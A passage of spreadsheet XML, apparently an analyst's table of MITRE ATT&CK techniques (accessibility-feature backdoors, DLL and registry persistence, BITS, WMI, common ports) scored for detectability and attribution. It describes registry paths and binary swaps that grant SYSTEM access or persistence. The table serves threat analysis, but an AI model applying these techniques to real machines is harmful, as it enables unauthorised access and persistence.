execution of arbitrary code to bypass application whitelisting policies that do not account for execution of rcsi.exe.7_x000a__x000a_WinDbg/CDB_x000a_WinDbg is a Microsoft Windows kernel and user-mode debugging utility. The Microsoft Console Debugger (CDB) cdb.exe is also user-mode debugger. Both utilities are included in Windows software development kits and can be used as standalone tools.8 They are commonly used in software development and reverse engineering and may not be found on typical Windows systems. Both WinDbg.exe and cdb.exe binaries are signed by Microsoft._x000a__x000a_An adversary can use WinDbg.exe and cdb.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for execution of those utilities.9_x000a__x000a_It is likely possible to use other debuggers for similar purposes, such as the kernel-mode debugger kd.exe, which is also signed by Microsoft._x000a__x000a_Tracker_x000a_The file tracker utility, tracker.exe, is included with the .NET framework as part of MSBuild. It is used for logging calls to the Windows file system.10_x000a__x000a_An adversary can use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions"/>
    <n v="2"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="User Execution"/>
    <x v="5"/>
    <s v="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
    <n v="4"/>
    <s v="User is required to take actions"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="2"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Windows Management Instrumentation"/>
    <x v="5"/>
    <s v="Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB)1 and Remote Procedure Call Service (RPCS)2 for remote access. RPCS operates over port 135.3_x000a__x000a_An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement."/>
    <n v="3"/>
    <s v="WMI traffic can be identified"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Technique may contain mission details"/>
  </r>
  <r>
    <s v="Windows Remote Management"/>
    <x v="5"/>
    <s v="Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).1 It may be called with the winrm command or by any number of programs such as PowerShell."/>
    <n v="3"/>
    <s v="Monitor WinRM usage"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Technique may contain mission details"/>
  </r>
  <r>
    <s v="Accessibility Features"/>
    <x v="6"/>
    <s v="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_x000a__x000a_Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as &quot;sticky keys&quot;, and has been used by adversaries for unauthenticated access through a remote desktop login screen.1_x000a__x000a_Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP).2 The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:_x000a__x000a_For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with &quot;cmd.exe&quot; (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges.3_x000a__x000a_For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures &quot;cmd.exe,&quot; or another program that provides backdoor access, as a &quot;debugger&quot; for the accessibility program (e.g., &quot;utilman.exe&quot;). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the &quot;debugger&quot; program to be executed with SYSTEM privileges.3_x000a__x000a_Other accessibility features exist that may also be leveraged in a similar fashion:2_x000a__x000a_On-Screen Keyboard: C:\Windows\System32\osk.exe_x000a_Magnifier: C:\Windows\System32\Magnify.exe_x000a_Narrator: C:\Windows\System32\Narrator.exe_x000a_Display Switcher: C:\Windows\System32\DisplaySwitch.exe_x000a_App Switcher: C:\Windows\System32\AtBroker.exe"/>
    <n v="3"/>
    <s v="Unusual RDP sessions may give it away. Manipulated binaries as well"/>
    <n v="3"/>
    <s v="If public RDP server is used, connection may be traced to attacker"/>
    <n v="2"/>
    <s v="Target RDP server may hint towards mission's target"/>
  </r>
  <r>
    <s v="AppCert DLLs"/>
    <x v="6"/>
    <s v="Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions:1_x000a__x000a_CreateProcess_x000a_CreateProcessAsUser_x000a_CreateProcessWithLoginW_x000a_CreateProcessWithTokenW_x000a_WinExec_x000a_Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer."/>
    <n v="1"/>
    <s v="Needs extensive monitoring on local machine (registry and memory)"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="AppInit DLLs"/>
    <x v="6"/>
    <s v="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1 Similar to Process Injection, these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.2_x000a__x000a_The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled."/>
    <n v="1"/>
    <s v="Needs extensive monitoring on local machine (registry and memory)"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Application Shimming"/>
    <x v="6"/>
    <s v="The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow backward compatibility of programs as Windows updates and changes its code. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.1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_x000a__x000a_%WINDIR%\AppPatch\sysmain.sdb_x000a_hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb_x000a_Custom databases are stored in:_x000a__x000a_%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom_x000a_hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom_x000a_To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Account Control (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to Hooking, utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc."/>
    <n v="3"/>
    <s v="Very visible for system admins"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Authentication Package"/>
    <x v="6"/>
    <s v="Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.1_x000a__x000a_Adversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of &quot;Authentication Packages&quot;=&lt;target binary&gt;. The binary will then be executed by the system when the authentication packages are loaded."/>
    <n v="3"/>
    <s v="Registry setting monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="BITS Jobs"/>
    <x v="6"/>
    <s v="Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM)1.2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_x000a__x000a_The interface to create and manage BITS jobs is accessible through PowerShell 2 and the BITSAdmin tool.3_x000a__x000a_Adversaries may abuse BITS to download, execute, and even clean up after malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.456 BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).74_x000a__x000a_BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol."/>
    <n v="3"/>
    <s v="Standard tooling is used, which may lead to logs/audit trails"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Bootkit"/>
    <x v="6"/>
    <s v="A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR).1_x000a__x000a_Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly."/>
    <n v="1"/>
    <s v="Disk is altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Browser Extensions"/>
    <x v="6"/>
    <s v="Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access.12_x000a__x000a_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3 Once the extension is installed, it can browse to websites in the background,45 steal all information that a user enters into a browser, to include credentials,67 and be used as an installer for a RAT for persistence. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions.8 There have also been similar examples of extensions being used for command &amp; control "/>
    <n v="4"/>
    <s v="Must be installed actively"/>
    <n v="3"/>
    <s v="Extension must be loaded from a source that can be traced"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Change Default File Association"/>
    <x v="6"/>
    <s v="When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access.12 Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened._x000a__x000a_System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example:_x000a__x000a_HKEY_CLASSES_ROOT\txtfile\shell\open\command_x000a_HKEY_CLASSES_ROOT\txtfile\shell\print\command_x000a_HKEY_CLASSES_ROOT\txtfile\shell\printto\command_x000a_The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to execute arbitrary commands."/>
    <n v="4"/>
    <s v="OS usage is changed"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Component Firmware"/>
    <x v="6"/>
    <s v="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
    <n v="1"/>
    <s v="Hard to detect"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Component Object Model Hijacking"/>
    <x v="6"/>
    <s v="The Microsoft Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system.1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2 An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection."/>
    <n v="2"/>
    <s v="Disk and registry altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Create Account"/>
    <x v="6"/>
    <s v="Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system._x000a__x000a_The net user commands can be used to create a local or domain account."/>
    <n v="3"/>
    <s v="Disk and SAM are altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="DLL Search Order Hijacking"/>
    <x v="6"/>
    <s v="Windows systems use a common method to look for required DLLs to load into a program.1 Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence._x000a__x000a_Adversaries may perform DLL preloading, also called binary planting attacks,2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3 Adversaries may use this behavior to cause the program to load a malicious DLL._x000a__x000a_Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation.456_x000a__x000a_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_x000a__x000a_Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace."/>
    <n v="3"/>
    <s v="Altering of system configuration"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="External Remote Services"/>
    <x v="6"/>
    <s v="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_x000a__x000a_Adversaries may use remote services to access and persist within a network.1 Access to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as part of Redundant Access during an operation."/>
    <n v="2"/>
    <s v="Monitoring for unexpected VPN and remote access tools can detect this."/>
    <n v="2"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="File System Permissions Weakness"/>
    <x v="6"/>
    <s v="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_x000a__x000a_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n v="2"/>
    <s v="Unusual binaries may occur in memory and on disk"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Hooking"/>
    <x v="6"/>
    <s v="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_x000a__x000a_Hooks procedures, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.12_x000a_Import address table (IAT) hooking, which use modifications to a process’s IAT, where pointers to imported API functions are stored.234_x000a_Inline hooking, which overwrites the first bytes in an API function to redirect code flow.254_x000a_Similar to Process Injection,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_x000a__x000a_Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access.6_x000a__x000a_Hooking is commonly utilized by Rootkits to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors"/>
    <n v="2"/>
    <s v="Rootkit detectors monitor for this"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Hypervisor"/>
    <x v="6"/>
    <s v="A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware.1 It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen.2 A type-1 hypervisor operates at a level below the operating system and could be designed with Rootkit functionality to hide its existence from the guest operating system.3 A malicious hypervisor of this nature could be used to persist on systems through interruption."/>
    <n v="1"/>
    <s v="Timing investigation of CPU instructions. This is very advanced"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Image File Execution Options Injection"/>
    <x v="6"/>
    <s v="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1_x000a__x000a_IFEOs can be set directly via the Registry or in Global Flags via the Gflags tool.2 IFEOs are represented as Debugger Values in the Registry under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/&lt;executable&gt; and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt; where &lt;executable&gt; is the binary on which the debugger is attached.1_x000a__x000a_Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer.3 Installing IFEO mechanisms may also provide Persistence via continuous invocation._x000a__x000a_Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications."/>
    <n v="1"/>
    <s v="Check for unusual parents to processes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="LSASS Driver"/>
    <x v="6"/>
    <s v="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1_x000a__x000a_Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., DLL Side-Loading or DLL Search Order Hijacking), an adversary can achieve arbitrary code execution triggered by continuous LSA operations."/>
    <n v="2"/>
    <s v="System events and modules loaded"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Logon Scripts"/>
    <x v="6"/>
    <s v="Windows_x000a_Windows allows logon scripts to be run whenever a specific user or group of users log into a system.1 The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server._x000a__x000a_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_x000a__x000a_Mac_x000a_Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root2. There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in."/>
    <n v="3"/>
    <s v="Configuration changes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Modify Existing Service"/>
    <x v="6"/>
    <s v="Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg._x000a__x000a_Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of Masquerading that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used._x000a__x000a_Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands."/>
    <n v="2"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Netsh Helper DLL"/>
    <x v="6"/>
    <s v="Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.1 The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh._x000a__x000a_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2_x000a__x000a_Proof of concept code exists to load Cobalt Strike's payload using netsh.exe helper DLLs."/>
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="New Service"/>
    <x v="6"/>
    <s v="When operating systems boot up, they can start programs or applications called services that perform background system functions.1 A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry._x000a__x000a_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
    <n v="2"/>
    <s v="Configuration changes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Office Application Startup"/>
    <x v="6"/>
    <s v="Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started._x000a_Office Template Macros_x000a_Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts.1_x000a__x000a_Office Visual Basic for Applications (VBA) macros2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34_x000a__x000a_Word Normal.dotm location:C:\Users\(username)\AppData\Roaming\Microsoft\Templates\Normal.dotm_x000a__x000a_Excel Personal.xlsb location:C:\Users\(username)\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB_x000a__x000a_An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros._x000a__x000a_Office Test_x000a_A Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started5_x000a__x000a_HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf_x000a__x000a_Add-ins_x000a_Office add-ins can be used to add functionality to Office programs.6_x000a__x000a_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
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="3"/>
    <s v="Sender of the Office document may indicate of target"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Path Interception"/>
    <x v="6"/>
    <s v="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1_x000a__x000a_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n v="2"/>
    <s v="Multiple indicators"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Port Monitors"/>
    <x v="6"/>
    <s v="A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.1 This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.2 Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. The Registry key contains entries for the following:_x000a__x000a_Local Port_x000a_Standard TCP/IP Port_x000a_USB Monitor_x000a_WSD Port_x000a_Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM."/>
    <n v="2"/>
    <s v="Registry setting monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Scheduled Task"/>
    <x v="6"/>
    <s v="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1_x000a__x000a_An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account."/>
    <n v="2"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Screensaver"/>
    <x v="6"/>
    <s v="Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.1 The Windows screensaver application scrnsave.exe is located in C:\Windows\System32\ along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence:_x000a__x000a_SCRNSAVE.exe - set to malicious PE path_x000a_ScreenSaveActive - set to '1' to enable the screensaver_x000a_ScreenSaverIsSecure - set to '0' to not require a password to unlock_x000a_ScreenSaverTimeout - sets user inactivity timeout before screensaver is executed_x000a_Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity."/>
    <n v="3"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Security Support Provider"/>
    <x v="6"/>
    <s v="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
    <n v="2"/>
    <s v="Registry setting monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Service Registry Permissions Weakness"/>
    <x v="6"/>
    <s v="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1_x000a__x000a_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_x000a__x000a_Adversaries may also alter Registry keys associated with service failure parameters (such as FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally corrupted."/>
    <n v="1"/>
    <s v="Commands run"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Shortcut Modification"/>
    <x v="6"/>
    <s v="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
    <n v="2"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="System Firmware"/>
    <x v="6"/>
    <s v="The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.123_x000a__x000a_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
    <n v="1"/>
    <s v="Whitelisting of EFI binaries"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Time Providers"/>
    <x v="6"/>
    <s v="The Windows Time service (W32Time) enables time synchronization across and within domains.1 W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.2_x000a__x000a_Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\.2 The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.2_x000a__x000a_Adversaries may abuse this architecture to establish Persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account"/>
    <n v="2"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Trap"/>
    <x v="6"/>
    <s v="The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where &quot;command list&quot; will be executed when &quot;signals&quot; are received."/>
    <n v="1"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Valid Accounts"/>
    <x v="6"/>
    <s v="Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access._x000a__x000a_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_x000a__x000a_Adversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful._x000a__x000a_The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise."/>
    <n v="3"/>
    <s v="Monitoring for unusual usage of the accounts"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="2"/>
    <s v="May disclose target, thus hint to mission"/>
  </r>
  <r>
    <s v="Web Shell"/>
    <x v="6"/>
    <s v="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1_x000a__x000a_Web shells may serve as Redundant Access or as a persistence mechanism in case an adversary's primary access methods are detected and removed."/>
    <n v="2"/>
    <s v="Monitor changes in the webroot"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="3"/>
    <s v="Commands may disclose mission details"/>
  </r>
  <r>
    <s v="Windows Management Instrumentation Event Subscription"/>
    <x v="6"/>
    <s v="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1 Examples of events that may be subscribed to are the wall clock time or the computer's uptime.2 Several threat groups have reportedly used this technique to maintain persistence."/>
    <n v="3"/>
    <s v="Monitor subscription entries"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Technique may contain mission details"/>
  </r>
  <r>
    <s v="Winlogon Helper DLL"/>
    <x v="6"/>
    <s v="Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.1_x000a__x000a_Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse:1_x000a__x000a_Winlogon\Notify - points to notification package DLLs that handle Winlogon events_x000a_Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on_x000a_Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on_x000a_Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence."/>
    <n v="3"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Commonly Used Port"/>
    <x v="7"/>
    <s v="Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as_x000a__x000a_TCP:80 (HTTP)_x000a_TCP:443 (HTTPS)_x000a_TCP:25 (SMTP)_x000a_TCP/UDP:53 (DNS)_x000a_They may use the protocol associated with the port or a completely different protocol._x000a__x000a_For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are_x000a__x000a_TCP/UDP:135 (RPC)_x000a_TCP/UDP:22 (SSH)_x000a_TCP/UDP:3389 (RDP)"/>
    <n v="2"/>
    <s v="Easy to detect due to traffic"/>
    <n v="4"/>
    <s v="The source is easily to detect"/>
    <n v="1"/>
    <s v="Too generic to tie to mission or attacker but might hint"/>
  </r>
  <r>
    <s v="Communication Through Removable Media"/>
    <x v="7"/>
    <s v="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
    <n v="2"/>
    <s v="Easy to detect due to traffic"/>
    <n v="4"/>
    <s v="The source is easily to detect"/>
    <n v="1"/>
    <s v="Too generic to tie to mission or attacker but might hint"/>
  </r>
  <r>
    <s v="Connection Proxy"/>
    <x v="7"/>
